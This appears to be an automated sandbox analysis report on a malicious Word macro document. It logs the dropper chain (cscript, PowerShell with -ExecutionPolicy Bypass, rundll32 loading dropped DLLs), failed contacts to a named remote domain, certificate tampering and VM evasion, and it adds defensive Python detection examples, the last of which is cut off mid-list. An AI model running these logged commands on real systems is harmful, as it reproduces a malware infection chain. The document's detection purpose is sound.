Source: sample.doc.doc, type: SAMPLE Matched rule: Office_AutoOpen_Macro date = 2015-05-28, hash5 = 7c06cab49b9332962625b16f15708345, hash4 = a3035716fe9173703941876c2bde9d98, hash3 = 66e67c2d84af85a569a04042141164e6, hash2 = 63f6b20cb39630b13c14823874bd3743, author = Florian Roth, description = Detects an Microsoft Office file that contains the AutoOpen Macro function, hash7 = 25285b8fe2c41bd54079c92c1b761381, hash6 = bfc30332b7b91572bfe712b656ea8a0c, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 4d00695d5011427efc33c9722c61ced2
Document has an unknown application name
Source: ~WRF{C9C61CB4-AA54-4D1D-A472-514E047583D2}.tmp.0.dr OLE indicator application name: unknown
Source: ~DFE56B344EF3200177.TMP.0.dr OLE indicator application name: unknown
Source: ~DF77272A7F6F18B150.TMP.0.dr OLE indicator application name: unknown
Source: ~DF26415DDA42946BBE.TMP.0.dr OLE indicator application name: unknown
Document contains an embedded VBA macro which executes code when the document is opened / closed
Source: sample.doc.doc OLE, VBA macro line: Sub AutoOpen()
Source: VBA code instrumentation OLE, VBA macro: Module ThisDocument, Function AutoOpen Name: AutoOpen
Source: ~DF77272A7F6F18B150.TMP.0.dr OLE, VBA macro line: Private Function JbxHook_Open_1__ob(jbxline, ByRef jbxthis, ByRef jbxparam0)
Source: ~DF77272A7F6F18B150.TMP.0.dr OLE, VBA macro line: Static jbxtresh_Open As Integer
Source: ~DF77272A7F6F18B150.TMP.0.dr OLE, VBA macro line: If jbxtresh_Open < 200 Then
Source: ~DF77272A7F6F18B150.TMP.0.dr OLE, VBA macro line: JbxHook_Open_1__ob = jbxthis.Open(jbxparam0)
Source: ~DF77272A7F6F18B150.TMP.0.dr OLE, VBA macro line: If jbxtresh_Open < 200 Then
Source: ~DF77272A7F6F18B150.TMP.0.dr OLE, VBA macro line: jbxtresh_Open = jbxtresh_Open + 1
Source: ~DF77272A7F6F18B150.TMP.0.dr OLE, VBA macro line: JbxLogParam "jbxreturn", JbxHook_Open_1__ob
Source: ~DF77272A7F6F18B150.TMP.0.dr OLE, VBA macro line: Private Function JbxHook_Open_4__ob(jbxline, ByRef jbxthis, ByRef jbxparam0, ByRef jbxparam1, ByRef jbxparam2, ByRef jbxparam3)
Source: ~DF77272A7F6F18B150.TMP.0.dr OLE, VBA macro line: Static jbxtresh_Open As Integer
Source: ~DF77272A7F6F18B150.TMP.0.dr OLE, VBA macro line: If jbxtresh_Open < 200 Then
Source: ~DF77272A7F6F18B150.TMP.0.dr OLE, VBA macro line: JbxHook_Open_4__ob = jbxthis.Open(jbxparam0, jbxparam1, jbxparam2, jbxparam3)
Source: ~DF77272A7F6F18B150.TMP.0.dr OLE, VBA macro line: If jbxtresh_Open < 200 Then
Source: ~DF77272A7F6F18B150.TMP.0.dr OLE, VBA macro line: jbxtresh_Open = jbxtresh_Open + 1
Source: ~DF77272A7F6F18B150.TMP.0.dr OLE, VBA macro line: JbxLogParam "jbxreturn", JbxHook_Open_4__ob
Source: ~DF77272A7F6F18B150.TMP.0.dr OLE, VBA macro line: JbxHook_Open_1__ob 9, con, "Provider=SQLOLEDB.1;Integrated Security=SSPI;Persist Security Info=False;Initial Catalog=LIBRARY;Data Source=PALEN\SQLPALENSERVER"
Source: ~DF77272A7F6F18B150.TMP.0.dr OLE, VBA macro line: JbxHook_Open_4__ob 21, rs, "select * from dbo.Tbl_BOOK where dbo.Tbl_BOOK.Call_no= " & "'" & frmTrans1.DataGrid4.Columns.Item(0).Text & "'", con, adOpenStatic, adLockOptimistic
Source: ~DF77272A7F6F18B150.TMP.0.dr OLE, VBA macro line: JbxHook_Open_4__ob 31, rs, "select * from dbo.Tbl_STUDENTS", con, adOpenStatic, adLockOptimistic
Source: ~DF77272A7F6F18B150.TMP.0.dr OLE, VBA macro line: JbxHook_Open_4__ob 38, rs, "Select * from Tbl_STUDENTS " & "where ID = '" & frmTrans1.txtSea.Text & "'", con, adOpenStatic, adLockOptimistic
Source: ~DF77272A7F6F18B150.TMP.0.dr OLE, VBA macro line: JbxHook_Open_4__ob 42, rs, "Select * from dbo.Tbl_STUDENTS " & "where Lastname = '" & frmTrans1.txtSea.Text & "'", con, adOpenStatic, adLockOptimistic
Source: ~DF77272A7F6F18B150.TMP.0.dr OLE, VBA macro line: JbxHook_Open_4__ob 46, rs, "Select * from dbo.Tbl_STUDENTS " & "where Course = '" & frmTrans1.txtSea.Text & "'", con, adOpenStatic, adLockOptimistic
Source: ~DF77272A7F6F18B150.TMP.0.dr OLE, VBA macro line: JbxHook_Open_4__ob 56, rs, "Select * from Tbl_BOOK " & "where Call_no = '" & frmTrans1.txtSBook & "'", con, adOpenStatic, adLockOptimistic
Source: ~DF77272A7F6F18B150.TMP.0.dr OLE, VBA macro line: JbxHook_Open_4__ob 60, rs, "Select * from dbo.Tbl_BOOK " & "where Title = '" & frmTrans1.txtSBook.Text & "'", con, adOpenStatic, adLockOptimistic
Source: ~DF77272A7F6F18B150.TMP.0.dr OLE, VBA macro line: JbxHook_Open_4__ob 70, rs, "Select * from dbo.Tbl_STUDENTS where dbo.Tbl_STUDENTS.ID= " & "'" & frmTrans1.DataGrid1.Columns.Item(0).Text & "'", con, adOpenStatic, adLockOptimistic
Source: ~DF77272A7F6F18B150.TMP.0.dr OLE, VBA macro line: JbxHook_Open_4__ob 80, rs, "select *from Tbl_Transaction where ID ='" & frmTrans1.txtID.Text & "'", con, adOpenStatic, adLockOptimistic
Source: ~DF77272A7F6F18B150.TMP.0.dr OLE, VBA macro line: JbxHook_Open_4__ob 93, rs, "select * from dbo.Tbl_BOOK", con, adOpenStatic, adLockOptimistic
Source: ~DF77272A7F6F18B150.TMP.0.dr OLE, VBA macro line: JbxHook_Open_4__ob 115, rs, "Select * from dbo.Tbl_TRANSACTION where dbo.Tbl_TRANSACTION.Call_no= " & "'" & frmTrans1.Datagrid3.Columns.Item(0).Text & "'", con, adOpenStatic, adLockOptimistic
Source: ~DF77272A7F6F18B150.TMP.0.dr OLE, VBA macro line: JbxHook_Open_4__ob 125, rs, "select * from dbo.Tbl_TRANSACTION where dbo.Tbl_TRANSACTION.ID='" & frmTrans1.Datagrid3.Columns.Item(3).Text & "'", con, adOpenStatic, adLockOptimistic
Source: ~DF77272A7F6F18B150.TMP.0.dr OLE, VBA macro line: Private Function JbxHook_Open_1__ob_set(jbxline, ByRef jbxthis, ByRef jbxparam0)
Source: ~DF77272A7F6F18B150.TMP.0.dr OLE, VBA macro line: Static jbxtresh_Open As Integer
Source: ~DF77272A7F6F18B150.TMP.0.dr OLE, VBA macro line: If jbxtresh_Open < 200 Then
Source: ~DF77272A7F6F18B150.TMP.0.dr OLE, VBA macro line: Set JbxHook_Open_1__ob_set = jbxthis.Open(jbxparam0)
Source: ~DF77272A7F6F18B150.TMP.0.dr OLE, VBA macro line: If jbxtresh_Open < 200 Then
Source: ~DF77272A7F6F18B150.TMP.0.dr OLE, VBA macro line: jbxtresh_Open = jbxtresh_Open + 1
Source: ~DF77272A7F6F18B150.TMP.0.dr OLE, VBA macro line: JbxLogParam "jbxreturn", JbxHook_Open_1__ob_set
Source: ~DF77272A7F6F18B150.TMP.0.dr OLE, VBA macro line: Sub AutoOpen()
Source: ~DF77272A7F6F18B150.TMP.0.dr OLE, VBA macro line: Set docNow = JbxHook_Open_1__ob_set(31, Documents, .SelectedItems(lr))
Document misses a certain OLE stream usually present in this Microsoft Office document type
Source: ~WRF{C9C61CB4-AA54-4D1D-A472-514E047583D2}.tmp.0.dr OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: ~DFE56B344EF3200177.TMP.0.dr OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: ~DF77272A7F6F18B150.TMP.0.dr OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: ~DF26415DDA42946BBE.TMP.0.dr OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Document contains no OLE stream with summary information
Source: ~WRF{C9C61CB4-AA54-4D1D-A472-514E047583D2}.tmp.0.dr OLE indicator has summary info: false
Source: ~DFE56B344EF3200177.TMP.0.dr OLE indicator has summary info: false
Source: ~DF77272A7F6F18B150.TMP.0.dr OLE indicator has summary info: false
Source: ~DF26415DDA42946BBE.TMP.0.dr OLE indicator has summary info: false
Document contains embedded VBA macros
Source: sample.doc.doc OLE indicator, VBA macros: true
Source: ~DF77272A7F6F18B150.TMP.0.dr OLE indicator, VBA macros: true
Source: sample.doc.doc Virustotal: Detection: 50%
Source: sample.doc.doc ReversingLabs: Detection: 60%
Source: C:\Windows\System32\cscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ...ned an error: (404) Not Found."
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: At line:1 char:40
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ...ot be resolved: 'lotolands.com'"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: At line:1 char:40
(The remaining console-write buffers captured in this run contain no readable text and are omitted.)
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Windows\System32\cscript.exe "C:\Windows\System32\cscript.exe" C:\Users\user\AppData\Roaming\www.txt //E:VBScript //NoLogo %~f0 %*
Source: C:\Windows\System32\cscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass & C:\Users\user\AppData\Roaming\www.ps1
Source: C:\Windows\System32\cscript.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c rundll32.exe C:\ProgramData\www1.dll,ldr
Source: C:\Windows\System32\cscript.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c rundll32.exe C:\ProgramData\www2.dll,ldr
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\ProgramData\www1.dll,ldr
Source: C:\Windows\System32\cscript.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c rundll32.exe C:\ProgramData\www3.dll,ldr
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\ProgramData\www2.dll,ldr
Source: C:\Windows\System32\cscript.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c rundll32.exe C:\ProgramData\www4.dll,ldr
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\ProgramData\www3.dll,ldr
Source: C:\Windows\System32\cscript.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c rundll32.exe C:\ProgramData\www5.dll,ldr
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\ProgramData\www4.dll,ldr
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\ProgramData\www5.dll,ldr
Source: C:\Windows\System32\cscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11CF-A4B0-00AA004A55E8}\InprocServer32
Source: sample.doc.doc OLE indicator, Word Document stream: true
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\Desktop\~$mple.doc.doc
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Temp\CVREE34.tmp
Source: classification engine Classification label: mal100.troj.expl.evad.winDOC@25/19@5/4
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File read: C:\Users\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
Source: powershell.exe, 00000003.00000002.490992699.000000001CD90000.00000002.00020000.sdmp, rundll32.exe, 00000008.00000002.508165947.0000000001C00000.00000002.00020000.sdmp, rundll32.exe, 0000000B.00000002.494551301.0000000001BF0000.00000002.00020000.sdmp, rundll32.exe, 0000000E.00000002.487440567.0000000001BF0000.00000002.00020000.sdmp Binary or memory string: .VBPud<_
Source: sample.doc.doc OLE document summary: title field not present or empty
Source: ~WRF{C9C61CB4-AA54-4D1D-A472-514E047583D2}.tmp.0.dr OLE document summary: title field not present or empty
Source: ~WRF{C9C61CB4-AA54-4D1D-A472-514E047583D2}.tmp.0.dr OLE document summary: author field not present or empty
Source: ~WRF{C9C61CB4-AA54-4D1D-A472-514E047583D2}.tmp.0.dr OLE document summary: edited time not present or 0
Source: ~DFE56B344EF3200177.TMP.0.dr OLE document summary: title field not present or empty
Source: ~DFE56B344EF3200177.TMP.0.dr OLE document summary: author field not present or empty
Source: ~DFE56B344EF3200177.TMP.0.dr OLE document summary: edited time not present or 0
Source: ~DF77272A7F6F18B150.TMP.0.dr OLE document summary: title field not present or empty
Source: ~DF77272A7F6F18B150.TMP.0.dr OLE document summary: author field not present or empty
Source: ~DF77272A7F6F18B150.TMP.0.dr OLE document summary: edited time not present or 0
Source: ~DF26415DDA42946BBE.TMP.0.dr OLE document summary: title field not present or empty
Source: ~DF26415DDA42946BBE.TMP.0.dr OLE document summary: author field not present or empty
Source: ~DF26415DDA42946BBE.TMP.0.dr OLE document summary: edited time not present or 0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Window found: window name: SysTabControl32 Jump to behavior
Source: C:\Windows\System32\rundll32.exe Automated click: OK (8 identical entries)
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dll Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: Binary string: :ystem.pdb& source: powershell.exe, 00000003.00000002.480423902.00000000022F7000.00000004.00000040.sdmp
Source: Binary string: System.pdbgement.Automation.pdbBBw source: powershell.exe, 00000003.00000002.480423902.00000000022F7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\System.pdby source: powershell.exe, 00000003.00000002.480423902.00000000022F7000.00000004.00000040.sdmp
Source: Binary string: m.Management.Automation.pdbpdbion.pdbAlbu source: powershell.exe, 00000003.00000002.480423902.00000000022F7000.00000004.00000040.sdmp
Source: Binary string: ws\System.pdbpdbtem.pdbIL source: powershell.exe, 00000003.00000002.480423902.00000000022F7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.pdbion source: powershell.exe, 00000003.00000002.480423902.00000000022F7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\dll\System.Management.Automation.pdbmmon source: powershell.exe, 00000003.00000002.480423902.00000000022F7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\symbols\dll\System.pdb_3 source: powershell.exe, 00000003.00000002.480423902.00000000022F7000.00000004.00000040.sdmp
Source: Binary string: System.pdb source: powershell.exe, 00000003.00000002.480423902.00000000022F7000.00000004.00000040.sdmp
Source: Binary string: System.pdb8 source: powershell.exe, 00000003.00000002.480423902.00000000022F7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\dll\System.pdben source: powershell.exe, 00000003.00000002.480423902.00000000022F7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdb Fil source: powershell.exe, 00000003.00000002.480423902.00000000022F7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.480423902.00000000022F7000.00000004.00000040.sdmp
Source: ~WRF{C9C61CB4-AA54-4D1D-A472-514E047583D2}.tmp.0.dr Initial sample: OLE indicators vbamacros = False

Data Obfuscation:

Document contains an embedded VBA with many string operations indicating source code obfuscation
Source: sample.doc.doc Stream path 'Macros/VBA/Module1' : High number of string operations
Source: sample.doc.doc Stream path 'Macros/VBA/Module2' : High number of string operations
Source: VBA code instrumentation OLE, VBA macro, High number of string operations: Module Module1 Name: Module1
Source: VBA code instrumentation OLE, VBA macro, High number of string operations: Module Module2 Name: Module2
Source: ~DF77272A7F6F18B150.TMP.0.dr Stream path 'VBA/Module1' : High number of string operations
Source: ~DF77272A7F6F18B150.TMP.0.dr Stream path 'VBA/Module2' : High number of string operations
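The "high number of string operations" signature above is a count-based heuristic over the VBA source of each module. The following Python is an added example, not part of this report and not the sandbox's own engine: it counts run-time string-building calls (Chr, StrReverse, Mid, Replace, the & operator) in a module and normalises the count by module length. The macro text it runs on is constructed for illustration and the thresholds are assumptions; in practice the module source would come from the Macros/VBA/Module1 and Module2 streams named above, for example via oletools' VBA_Parser.extract_macros().

```python
import re

# Constructed sample macro (not extracted from the analysed document): it shows the
# run-time string assembly that a "high number of string operations" signature flags.
SAMPLE_VBA = '''
Sub AutoOpen()
    Dim s As String
    s = Chr(112) & Chr(111) & Chr(119) & Chr(101) & Chr(114)
    s = s & StrReverse("llehs") & Mid("xyz.exe", 4, 4)
    s = Replace(s, "xx", "")
    Shell s & " -ExecutionPolicy Bypass", vbHide
End Sub
'''

# Constructed benign macro for comparison.
CLEAN_VBA = '''
Sub AutoOpen()
    MsgBox "Document opened"
End Sub
'''

# VBA functions and the & operator that are used to build strings at run time.
# &H is excluded so hex literals (&H1F) are not counted as concatenations.
STRING_OPS = re.compile(
    r'\b(Chr[BW]?|Asc[BW]?|StrReverse|MidB?|LeftB?|RightB?|Replace|Split|Join|'
    r'StrConv|Hex|Oct|Val|CStr|UCase|LCase|Trim|InStr(?:Rev)?|Format)\s*\('
    r'|&(?!H)',
    re.IGNORECASE)


def count_string_ops(vba_source: str) -> dict:
    """Count each string-building function/operator in a VBA module."""
    counts: dict = {}
    for m in STRING_OPS.finditer(vba_source):
        key = m.group(1).lower() if m.group(1) else '&'
        counts[key] = counts.get(key, 0) + 1
    return counts


def code_lines(vba_source: str) -> int:
    """Non-blank, non-comment lines; used to normalise the count by module size."""
    return sum(1 for ln in vba_source.splitlines()
               if ln.strip() and not ln.strip().startswith("'"))


def is_obfuscated(vba_source: str, min_ops: int = 10, ops_per_line: float = 1.0) -> bool:
    """Heuristic: many string operations, and many relative to the module length.
    Thresholds are assumptions for illustration, not the sandbox's own values."""
    total = sum(count_string_ops(vba_source).values())
    return total >= min_ops and total / max(code_lines(vba_source), 1) >= ops_per_line


if __name__ == '__main__':
    for name, src in (('sample', SAMPLE_VBA), ('clean', CLEAN_VBA)):
        print(name, count_string_ops(src), 'obfuscated' if is_obfuscated(src) else 'ok')
```

The per-line ratio matters more than the raw count: a long, legitimate form module can contain dozens of Mid/Replace calls, while a six-line AutoOpen that builds its command string character by character is the pattern worth alerting on.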

Hooking and other Techniques for Hiding and Protection:

Stores large binary data to the registry
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior (62 identical entries)
Source: C:\Windows\System32\cscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior (5 identical entries)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior (55 identical entries)
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior (5 identical entries)

Malware Analysis System Evasion:

May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1708 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Contains long sleeps (>= 3 min)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Contains functionality to detect virtual machines (SLDT)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_000007FF00260F5C sldt word ptr [eax] 3_2_000007FF00260F5C
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini Jump to behavior
Source: powershell.exe, 00000003.00000002.480149738.00000000003F2000.00000004.00000020.sdmp Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
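A triage pass over the evasion indicators in this section, added here as an example that is not part of the report or of the sandbox: it parses the sleep, "Code function" and memory-string lines, classifies the sleep value, flags descriptor-table instructions such as sldt, and looks for known hypervisor strings. The one caveat it encodes is that 922337203685477 is TimeSpan.MaxValue expressed in milliseconds ((2^63 - 1) ticks of 100 ns divided by 10000), which is .NET's infinite wait timeout, so the "long sleep" hit above is an indefinite wait rather than a timed sleep loop. The input lines are copied from this section plus one constructed line (marked); the thresholds and marker list are assumptions.

```python
import re

# Lines copied from the evasion section of this report, plus one constructed line
# (marked) so the long-sleep branch is exercised.
SAMPLE_LINES = [
    r"Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1708 Thread sleep time: -922337203685477s >= -30000s",
    r"Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477",
    r"Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_000007FF00260F5C sldt word ptr [eax] 3_2_000007FF00260F5C",
    r"Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation",
    r"Source: powershell.exe, 00000003.00000002.480149738.00000000003F2000.00000004.00000020.sdmp Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}",
    r"Source: C:\example\agent.exe TID: 42 Thread sleep time: -300s >= -30000s",   # constructed, not from the report
]

# TimeSpan.MaxValue (2^63-1 ticks of 100 ns) expressed in milliseconds. A sleep/wait
# with exactly this value is .NET's "infinite" timeout, not a timed evasive sleep.
DOTNET_MAX_MS = (2**63 - 1) // 10_000

SLEEP_RE = re.compile(r"Thread (?:sleep time|delayed: delay time): -?(\d+)")
# Descriptor/task-register reads used by classic VM checks (Red Pill: sidt, No Pill: sldt).
VM_INSN_RE = re.compile(r"\b(sldt|sidt|sgdt|str)\b", re.I)
# Hypervisor substrings looked for in extracted memory strings (assumed list).
VM_MARKERS = ("vmware", "vbox", "virtualbox", "qemu", "hyper-v", "xenvmm")


def triage_evasion(lines, long_sleep_s=180):
    """Return (kind, detail) findings for sleep, VM-instruction and VM-string lines.
    long_sleep_s mirrors the report's ">= 3 min" signature; it is an assumed threshold."""
    findings = []
    for ln in lines:
        m = SLEEP_RE.search(ln)
        if m:
            value = int(m.group(1))          # compare the printed magnitude, sign dropped
            if value == DOTNET_MAX_MS:
                findings.append(("infinite_wait", value))
            elif value >= long_sleep_s:
                findings.append(("long_sleep", value))
            continue
        if "Code function:" in ln:
            insn = VM_INSN_RE.search(ln.split("Code function:", 1)[1])
            if insn:
                findings.append(("vm_instruction", insn.group(1).lower()))
            continue
        if "Binary or memory string:" in ln:
            s = ln.split("Binary or memory string:", 1)[1].lower()
            hits = tuple(sorted(mk for mk in VM_MARKERS if mk in s))
            if hits:
                findings.append(("vm_artifact", hits))
    return findings


if __name__ == "__main__":
    for f in triage_evasion(SAMPLE_LINES):
        print(f)
```

The VMware CD-ROM device path is a memory string of the sandbox VM itself, read by the process while enumerating devices; it is evidence the process touched device names, not proof that it compares them against a hypervisor list, so it is scored lower than the sldt read.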

Anti Debugging:

Enables debug privileges
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

Yara detected Powershell download and execute
Source: Yara match File source: sample.doc.doc, type: SAMPLE
Source: Yara match File source: C:\Users\user\AppData\Roaming\www.ps1, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\~DF26415DDA42946BBE.TMP, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{C9C61CB4-AA54-4D1D-A472-514E047583D2}.tmp, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\~DF77272A7F6F18B150.TMP, type: DROPPED
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\cscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass & C:\Users\user\AppData\Roaming\www.ps1 Jump to behavior
Source: C:\Windows\System32\cscript.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c rundll32.exe C:\ProgramData\www1.dll,ldr Jump to behavior
Source: C:\Windows\System32\cscript.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c rundll32.exe C:\ProgramData\www2.dll,ldr Jump to behavior
Source: C:\Windows\System32\cscript.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c rundll32.exe C:\ProgramData\www3.dll,ldr Jump to behavior
Source: C:\Windows\System32\cscript.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c rundll32.exe C:\ProgramData\www4.dll,ldr Jump to behavior
Source: C:\Windows\System32\cscript.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c rundll32.exe C:\ProgramData\www5.dll,ldr Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\ProgramData\www1.dll,ldr Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\ProgramData\www2.dll,ldr Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\ProgramData\www3.dll,ldr Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\ProgramData\www4.dll,ldr Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\ProgramData\www5.dll,ldr Jump to behavior
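The process-creation events above record the execution chain cscript.exe -> powershell.exe -ExecutionPolicy Bypass and cscript.exe -> cmd.exe /c rundll32.exe C:\ProgramData\wwwN.dll,ldr. The following Python is an added example, not code from the report or from the sandbox: it parses such event lines and applies three rules a detection engineer would derive from them (a script host or Office process spawning a shell, a PowerShell execution-policy bypass, and rundll32 loading a DLL from a user-writable directory). The parent/child lists, the writable-path list and the regexes are assumptions; the sample events are copied from this section plus one constructed benign line.

```python
import re
from collections import Counter

# Process-creation lines copied from this report (the parser strips the trailing
# "Jump to behavior" link text); the last line is constructed and must not fire.
SAMPLE_EVENTS = [
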